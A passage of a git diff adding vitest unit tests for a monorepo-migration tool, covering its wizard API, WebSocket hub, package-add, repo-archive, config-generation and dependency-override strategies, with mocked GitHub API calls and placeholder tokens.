2, + repos: ['/tmp/test-repo'], + completedSteps: [0, 1], + }; + await authPut('/api/wizard/state').send(state); + + const res = await authGet('/api/wizard/state'); + expect(res.status).toBe(200); + expect(res.body.exists).toBe(true); + expect(res.body.state.currentStep).toBe(2); + }); + }); + + describe('POST /api/wizard/init', () => { + it('should reject missing repos', async () => { + const res = await authPost('/api/wizard/init').send({}); + expect(res.status).toBe(400); + expect(res.body.error).toContain('repos'); + }); + + 
it('should reject empty repos array', async () => { + const res = await authPost('/api/wizard/init').send({ repos: [] }); + expect(res.status).toBe(400); + }); + + it('should reject non-string repos', async () => { + const res = await authPost('/api/wizard/init').send({ repos: [1, 2] }); + expect(res.status).toBe(400); + }); + + it('should create default state with provided repos', async () => { + const res = await authPost('/api/wizard/init').send({ + repos: ['/tmp/repo-a', '/tmp/repo-b'], + }); + expect(res.status).toBe(200); + expect(res.body.state).toBeDefined(); + expect(res.body.state.version).toBe(1); + }); + }); +}); diff --git a/tests/unit/server/ws-hub.test.ts b/tests/unit/server/ws-hub.test.ts index e2694e3..def3be1 100755 --- a/tests/unit/server/ws-hub.test.ts +++ b/tests/unit/server/ws-hub.test.ts @@ -119,6 +119,31 @@ describe('WsHub', () => { expect((ws as any).sent.length).toBe(0); // 0 because there were no buffered events at subscribe time }); + it('ignores malformed WebSocket messages', () => { + const ws = createMockWs(); + hub.register(ws); + + // Send a non-JSON message — should not throw + ws.emit('message', 'not json at all{{{'); + + // Send a message with missing type — should not throw + ws.emit('message', JSON.stringify({ opId: 'op1' })); + + // Hub should still function + hub.createOperation('op1'); + hub.broadcast('op1', { type: 'done', opId: 'op1' }); + expect(hub.isDone('op1')).toBe(true); + }); + + it('throws when max concurrent operations exceeded', () => { + // Create ops up to the limit (MAX_CONCURRENT = 5) + for (let i = 0; i < 5; i++) { + hub.createOperation(`op-${i}`); + } + + expect(() => hub.createOperation('op-overflow')).toThrow('Too many concurrent operations'); + }); + it('scheduleCleanup removes operation after delay', async () => { hub.createOperation('op1'); hub.broadcast('op1', { type: 'log', level: 'info', message: 'test', opId: 'op1' }); diff --git a/tests/unit/strategies/add.test.ts 
b/tests/unit/strategies/add.test.ts new file mode 100644 index 0000000..052aa26 --- /dev/null +++ b/tests/unit/strategies/add.test.ts @@ -0,0 +1,380 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import fs from 'fs-extra'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { applyAddPlan, generateAddPlan } from '../../../src/strategies/add.js'; +import type { AddPlan, Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('add strategy', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `add-test-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + describe('generateAddPlan', () => { + it('should throw for invalid repo source', async () => { + const logger = mockLogger(); + await expect( + generateAddPlan( + '/completely/nonexistent/source/repo', + { to: tempDir, packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow(); + }); + + it('should throw for non-existent target monorepo', async () => { + const logger = mockLogger(); + await expect( + generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: '/nonexistent/monorepo/path', packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow('Target monorepo does not exist'); + }); + + it('should throw for monorepo without package.json', async () => { + const monorepoDir = path.join(tempDir, 'monorepo-no-pkg'); + await fs.ensureDir(monorepoDir); + const logger = mockLogger(); + await expect( + generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ), + ).rejects.toThrow('No package.json found in monorepo'); + }); + + it('should 
generate plan for valid monorepo with existing packages', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + const packagesDir = path.join(monorepoDir, 'packages'); + const existingPkg = path.join(packagesDir, 'existing-pkg'); + await fs.ensureDir(existingPkg); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeJson(path.join(existingPkg, 'package.json'), { + name: 'existing-pkg', + version: '1.0.0', + }); + + const logger = mockLogger(); + const plan = await generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.targetMonorepo).toBe(monorepoDir); + expect(plan.operations.length).toBeGreaterThanOrEqual(3); + }); + + it('should detect cross-dependencies between new and existing packages', async () => { + const monorepoDir = path.join(tempDir, 'monorepo-cross'); + const packagesDir = path.join(monorepoDir, 'packages'); + // Create an existing package named "lodash" (repo-a depends on lodash) + const existingPkg = path.join(packagesDir, 'lodash'); + await fs.ensureDir(existingPkg); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeJson(path.join(existingPkg, 'package.json'), { + name: 'lodash', + version: '5.0.0', + }); + + const logger = mockLogger(); + const plan = await generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ); + + // repo-a depends on lodash, and there's a package named lodash + expect(plan.analysis.crossDependencies.length).toBeGreaterThanOrEqual(1); + expect(plan.analysis.crossDependencies[0].toPackage).toBe('lodash'); + }); + }); + + describe('applyAddPlan', () => { + it('should execute copy operation', async () => { + const monorepoDir = 
path.join(tempDir, 'monorepo'); + const sourceDir = path.join(tempDir, 'source'); + await fs.ensureDir(monorepoDir); + await fs.ensureDir(sourceDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeFile(path.join(sourceDir, 'index.ts'), 'export const x = 1;'); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: sourceDir, resolved: sourceDir, name: 'my-lib' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy my-lib to packages/my-lib', + inputs: [sourceDir], + outputs: ['packages/my-lib'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + expect(await fs.pathExists(path.join(monorepoDir, 'packages/my-lib/index.ts'))).toBe(true); + }); + + it('should execute write operation to update workspaces', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/existing'], + }); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'new-pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + ], + 
}; + + const logger = mockLogger(); + await applyAddPlan(plan, logger); + + const rootPkg = await fs.readJson(path.join(monorepoDir, 'package.json')); + expect(rootPkg.workspaces).toContain('packages/new-pkg'); + expect(rootPkg.workspaces).toContain('packages/existing'); + }); + + it('should not duplicate workspace entries', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/existing', 'packages/my-pkg'], + }); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'my-pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + ], + }; + + const logger = mockLogger(); + await applyAddPlan(plan, logger); + + const rootPkg = await fs.readJson(path.join(monorepoDir, 'package.json')); + const matches = rootPkg.workspaces.filter((w: string) => w === 'packages/my-pkg'); + expect(matches).toHaveLength(1); + }); + + it('should handle exec operation by skipping', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 
'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + expect(logger.info).toHaveBeenCalledWith(expect.stringContaining('Skipping install')); + }); + + it('should handle copy operation with no inputs gracefully', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy pkg to packages/pkg', + inputs: [], + outputs: ['packages/pkg'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + }); + + it('should execute multiple operations in sequence', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + const sourceDir = path.join(tempDir, 'source'); + await fs.ensureDir(monorepoDir); + await fs.ensureDir(sourceDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeFile(path.join(sourceDir, 'lib.ts'), 'export default {};'); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: sourceDir, resolved: sourceDir, name: 'lib' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + 
}, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy lib to packages/lib', + inputs: [sourceDir], + outputs: ['packages/lib'], + }, + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + { + id: 'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + + expect(result.success).toBe(true); + expect(result.packageDir).toBe(path.join(monorepoDir, 'packages/lib')); + expect(await fs.pathExists(path.join(monorepoDir, 'packages/lib/lib.ts'))).toBe(true); + }); + }); +}); diff --git a/tests/unit/strategies/archive.test.ts b/tests/unit/strategies/archive.test.ts new file mode 100644 index 0000000..f1eb356 --- /dev/null +++ b/tests/unit/strategies/archive.test.ts @@ -0,0 +1,254 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { + generateReadmeDeprecationPatch, + generateArchivePlan, + applyArchiveViaGitHubApi, +} from '../../../src/strategies/archive.js'; +import type { ArchivePlan, Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('archive strategy', () => { + describe('generateReadmeDeprecationPatch', () => { + it('should generate a unified diff format', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('--- a/README.md'); + expect(patch).toContain('+++ b/README.md'); + expect(patch).toContain('@@'); + }); + + it('should include the repo name as heading', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('+# my-lib'); + }); 
+ + it('should include monorepo URL', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://github.com/org/mono'); + expect(patch).toContain('https://github.com/org/mono'); + }); + + it('should include migration notice', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://example.com/mono'); + expect(patch).toContain('archived'); + expect(patch).toContain('no longer maintained'); + }); + + it('should include instructions to file issues elsewhere', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://example.com/mono'); + expect(patch).toContain('file issues'); + expect(patch).toContain('pull requests'); + }); + }); + + describe('generateArchivePlan', () => { + it('should generate a plan for local fixture repos', async () => { + const fixtureA = 'tests/fixtures/repo-a'; + const fixtureB = 'tests/fixtures/repo-b'; + const plan = await generateArchivePlan( + [fixtureA, fixtureB], + 'https://github.com/org/monorepo', + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.createdAt).toBeTruthy(); + expect(plan.monorepoUrl).toBe('https://github.com/org/monorepo'); + expect(plan.repos).toHaveLength(2); + expect(plan.repos[0].readmePatch).toContain('--- a/README.md'); + expect(plan.repos[1].readmePatch).toContain('--- a/README.md'); + }); + + it('should not include apiOperations by default', async () => { + const plan = await generateArchivePlan( + ['tests/fixtures/repo-a'], + 'https://github.com/org/monorepo', + ); + expect(plan.apiOperations).toBeUndefined(); + }); + + it('should include apiOperations when tokenFromEnv is true', async () => { + const plan = await generateArchivePlan( + ['tests/fixtures/repo-a'], + 'https://github.com/org/monorepo', + { tokenFromEnv: true }, + ); + expect(plan.apiOperations).toBeDefined(); + expect(plan.apiOperations!.length).toBeGreaterThan(0); + expect(plan.apiOperations![0].action).toBe('archive'); + }); + + it('should throw on invalid repo sources', async () => { + await 
expect( + generateArchivePlan([], 'https://github.com/org/monorepo'), + ).rejects.toThrow(); + }); + }); + + describe('applyArchiveViaGitHubApi', () => { + const originalEnv = process.env; + let logger: Logger; + + beforeEach(() => { + logger = mockLogger(); + process.env = { ...originalEnv }; + }); + + afterEach(() => { + process.env = originalEnv; + vi.restoreAllMocks(); + }); + + it('should throw when no GitHub token is set', async () => { + delete process.env.GITHUB_TOKEN; + delete process.env.GH_TOKEN; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'org/my-lib', action: 'archive' }], + }; + + await expect(applyArchiveViaGitHubApi(plan, logger)).rejects.toThrow('GitHub token required'); + }); + + it('should handle plan with no apiOperations gracefully', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.applied).toEqual([]); + expect(result.failed).toEqual([]); + }); + + it('should fail for repos that cannot be parsed', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'invalid-format', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('Could not parse'); + }); + + it('should handle fetch failures gracefully', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + // Mock fetch to simulate network error + const originalFetch = globalThis.fetch; + globalThis.fetch = 
vi.fn().mockRejectedValue(new Error('Network error')); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('Network error'); + + globalThis.fetch = originalFetch; + }); + + it('should handle HTTP error responses', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ + ok: false, + status: 403, + text: () => Promise.resolve('Forbidden'), + }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('HTTP 403'); + + globalThis.fetch = originalFetch; + }); + + it('should succeed with successful API response', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ + ok: true, + status: 200, + }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.applied).toEqual(['github.com/org/my-lib']); + expect(result.failed).toEqual([]); + + globalThis.fetch = originalFetch; + }); + + it('should use GH_TOKEN when GITHUB_TOKEN is not set', async () => { + delete process.env.GITHUB_TOKEN; + 
process.env.GH_TOKEN = 'gh-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ ok: true, status: 200 }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + await applyArchiveViaGitHubApi(plan, logger); + expect(globalThis.fetch).toHaveBeenCalledWith( + expect.stringContaining('api.github.com'), + expect.objectContaining({ + headers: expect.objectContaining({ + Authorization: 'Bearer gh-token', + }), + }), + ); + + globalThis.fetch = originalFetch; + }); + }); +}); diff --git a/tests/unit/strategies/configure.test.ts b/tests/unit/strategies/configure.test.ts new file mode 100755 index 0000000..bee5289 --- /dev/null +++ b/tests/unit/strategies/configure.test.ts @@ -0,0 +1,281 @@ +import path from 'node:path'; +import fs from 'fs-extra'; +import { describe, it, expect, afterEach } from 'vitest'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; +import { generateConfigPlan, applyConfigPlan } from '../../../src/strategies/configure.js'; + +afterEach(async () => { + await cleanupFixtures(); +}); + +describe('Configure Engine', () => { + describe('generateConfigPlan', () => { + it('with no existing configs should generate Prettier, ESLint, and .prettierignore patches', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-no-configs', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a', 'packages/pkg-b'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a', 'pkg-b'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).toContain('.prettierrc.json'); + expect(patchPaths).toContain('.prettierignore'); + 
expect(patchPaths).toContain('.eslintrc.json'); + expect(plan.warnings).toHaveLength(0); + + // Verify Prettier content is valid JSON with expected keys + const prettierPatch = plan.patches.find((p) => p.path === '.prettierrc.json')!; + const prettierConfig = JSON.parse(prettierPatch.after); + expect(prettierConfig).toHaveProperty('singleQuote', true); + expect(prettierConfig).toHaveProperty('semi', true); + + // Verify ESLint content + const eslintPatch = plan.patches.find((p) => p.path === '.eslintrc.json')!; + const eslintConfig = JSON.parse(eslintPatch.after); + expect(eslintConfig).toHaveProperty('root', true); + + // Verify .prettierignore content + const ignorePatch = plan.patches.find((p) => p.path === '.prettierignore')!; + expect(ignorePatch.after).toContain('node_modules'); + expect(ignorePatch.after).toContain('dist'); + }); + + it('with existing .prettierrc.json should NOT generate Prettier patch', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-has-prettier', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.prettierrc.json': JSON.stringify({ semi: false }), + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).not.toContain('.prettierrc.json'); + // .prettierignore should still be generated since it doesn't exist + expect(patchPaths).toContain('.prettierignore'); + // ESLint should still be generated + expect(patchPaths).toContain('.eslintrc.json'); + }); + + it('with .eslintrc.js should produce a warning instead of a patch', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-eslint-js', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.eslintrc.js': 'module.exports = { root: true };', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 
'packages', + ); + + // Should NOT generate an ESLint JSON patch + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).not.toContain('.eslintrc.json'); + + // Should produce a warning about the JS config + expect(plan.warnings.length).toBeGreaterThanOrEqual(1); + const eslintWarning = plan.warnings.find((w) => w.config.includes('ESLint')); + expect(eslintWarning).toBeDefined(); + expect(eslintWarning!.reason).toContain('Executable config file'); + expect(eslintWarning!.suggestion).toContain('review'); + }); + + it('with TypeScript packages should generate root tsconfig with references and per-package composite patches', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-typescript', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/tsconfig.json': JSON.stringify({ + compilerOptions: { target: 'ES2020', strict: true }, + }), + 'packages/pkg-b/tsconfig.json': JSON.stringify({ + compilerOptions: { target: 'ES2022' }, + }), + }, + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a', 'pkg-b'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + + // Should generate root tsconfig.json + expect(patchPaths).toContain('tsconfig.json'); + const rootTsPatch = plan.patches.find((p) => p.path === 'tsconfig.json')!; + const rootTsConfig = JSON.parse(rootTsPatch.after); + expect(rootTsConfig.references).toEqual([ + { path: './packages/pkg-a' }, + { path: './packages/pkg-b' }, + ]); + expect(rootTsConfig.compilerOptions.composite).toBe(true); + + // Should generate per-package composite patches + expect(patchPaths).toContain('packages/pkg-a/tsconfig.json'); + expect(patchPaths).toContain('packages/pkg-b/tsconfig.json'); + + const pkgAPatch = plan.patches.find((p) => p.path === 'packages/pkg-a/tsconfig.json')!; + const pkgAConfig = JSON.parse(pkgAPatch.after); + expect(pkgAConfig.compilerOptions.composite).toBe(true); + // Should preserve existing compiler 
options + expect(pkgAConfig.compilerOptions.target).toBe('ES2020'); + expect(pkgAConfig.compilerOptions.strict).toBe(true); + + // Should have a before field (existing content) + expect(pkgAPatch.before).toBeDefined(); + }); + + it('should warn about per-package JS eslint config', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-pkg-eslint-js', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/eslint.config.js': 'export default {};', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + const pkgWarning = plan.warnings.find( + (w) => w.config.includes('pkg-a') && w.config.includes('ESLint'), + ); + expect(pkgWarning).toBeDefined(); + expect(pkgWarning!.reason).toContain('manual review'); + }); + + it('should handle unparseable per-package tsconfig gracefully', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-bad-tsconfig', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/tsconfig.json': 'not valid json{{{', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + // Should not crash, should still generate root tsconfig + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).toContain('tsconfig.json'); + // But should NOT generate a per-package tsconfig patch for the bad one + expect(patchPaths).not.toContain('packages/pkg-a/tsconfig.json'); + }); + + it('should log summary when logger is provided', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-logger', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a'], + }); + + const logger = createMockLogger(); + + await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + {}, + logger, + ); + + expect(logger.info).toHaveBeenCalledWith( + 
expect.stringContaining('ConfigPlan'), + ); + }); + }); + + describe('applyConfigPlan', () => { + it('should write files to disk', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-apply', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a'], + }); + + // First generate a plan + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + // Then apply it + const logger = createMockLogger(); + await applyConfigPlan(plan, monorepoDir, logger); + + // Verify files were written to disk + const prettierExists = await fs.pathExists(path.join(monorepoDir, '.prettierrc.json')); + expect(prettierExists).toBe(true); + + const eslintExists = await fs.pathExists(path.join(monorepoDir, '.eslintrc.json')); + expect(eslintExists).toBe(true); + + const ignoreExists = await fs.pathExists(path.join(monorepoDir, '.prettierignore')); + expect(ignoreExists).toBe(true); + + // Verify content is correct + const prettierContent = await fs.readFile(path.join(monorepoDir, '.prettierrc.json'), 'utf-8'); + const prettierConfig = JSON.parse(prettierContent); + expect(prettierConfig).toHaveProperty('singleQuote', true); + + // Verify logger was called for each patch + expect(logger.info).toHaveBeenCalledWith(expect.stringContaining('Wrote')); + }); + + it('should log warnings from the plan', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-apply-warn', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.eslintrc.js': 'module.exports = { root: true };', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + expect(plan.warnings.length).toBeGreaterThan(0); + + const logger = createMockLogger(); + await applyConfigPlan(plan, monorepoDir, logger); + + // Warnings should be logged + expect(logger.warn).toHaveBeenCalled(); + }); + }); +}); diff --git 
a/tests/unit/strategies/dependency-enforcement.test.ts b/tests/unit/strategies/dependency-enforcement.test.ts new file mode 100755 index 0000000..37672dd --- /dev/null +++ b/tests/unit/strategies/dependency-enforcement.test.ts @@ -0,0 +1,365 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { + generateOverrides, + getOverridesKey, + normalizeToWorkspaceProtocol, + applyOverridesToPackageJson, + verifyEnforcement, +} from '../../../src/strategies/dependency-enforcement.js'; +import type { + DependencyConflict, + PlanDecision, + PackageInfo, + PackageManagerType, +} from '../../../src/types/index.js'; + +const createPackageInfo = ( + name: string, + overrides: Partial<PackageInfo> = {}, +): PackageInfo => ({ + name, + version: '1.0.0', + dependencies: {}, + devDependencies: {}, + peerDependencies: {}, + scripts: {}, + path: `/packages/${name}`, + repoName: name, + ...overrides, +}); + +describe('Dependency Enforcement', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + describe('generateOverrides', () => { + it('should produce correct overrides from conflicts and decisions', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'react', + versions: [ + { version: '^17.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const decisions: PlanDecision[] = [ + { + id: 'dep-lodash', + kind: 'version-conflict', + chosen: '^4.17.21', + alternatives: ['^4.17.20'], + }, + { + id: 'dep-react', + kind: 'version-conflict', + chosen: '^18.0.0', + alternatives: ['^17.0.0'], + }, + ]; + + const result = generateOverrides(conflicts, decisions, 'pnpm'); + 
expect(result).toEqual({ + lodash: '^4.17.21', + react: '^18.0.0', + }); + }); + + it('should fall back to the first version when no decision matches', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'typescript', + versions: [ + { version: '^5.0.0', source: 'repo-a', type: 'devDependencies' }, + { version: '^4.9.0', source: 'repo-b', type: 'devDependencies' }, + ], + severity: 'major', + }, + ]; + + const decisions: PlanDecision[] = [ + { + id: 'dep-unrelated', + kind: 'version-conflict', + chosen: '^1.0.0', + alternatives: [], + }, + ]; + + const result = generateOverrides(conflicts, decisions, 'npm'); + + expect(result).toEqual({ + typescript: '^5.0.0', + }); + }); + }); + + describe('getOverridesKey', () => { + it('should return pnpm.overrides for pnpm', () => { + expect(getOverridesKey('pnpm')).toBe('pnpm.overrides'); + }); + + it('should return resolutions for yarn', () => { + expect(getOverridesKey('yarn')).toBe('resolutions'); + }); + + it('should return resolutions for yarn-berry', () => { + expect(getOverridesKey('yarn-berry')).toBe('resolutions'); + }); + + it('should return overrides for npm', () => { + expect(getOverridesKey('npm')).toBe('overrides'); + }); + }); + + describe('normalizeToWorkspaceProtocol', () => { + it('should generate update entries with workspace protocol for internal deps', () => { + const packages: PackageInfo[] = [ + createPackageInfo('pkg-a', { + dependencies: { 'pkg-b': '^1.0.0' }, + }), + createPackageInfo('pkg-b', { + dependencies: { lodash: '^4.17.21' }, + }), + ]; + + const updates = normalizeToWorkspaceProtocol({}, packages, 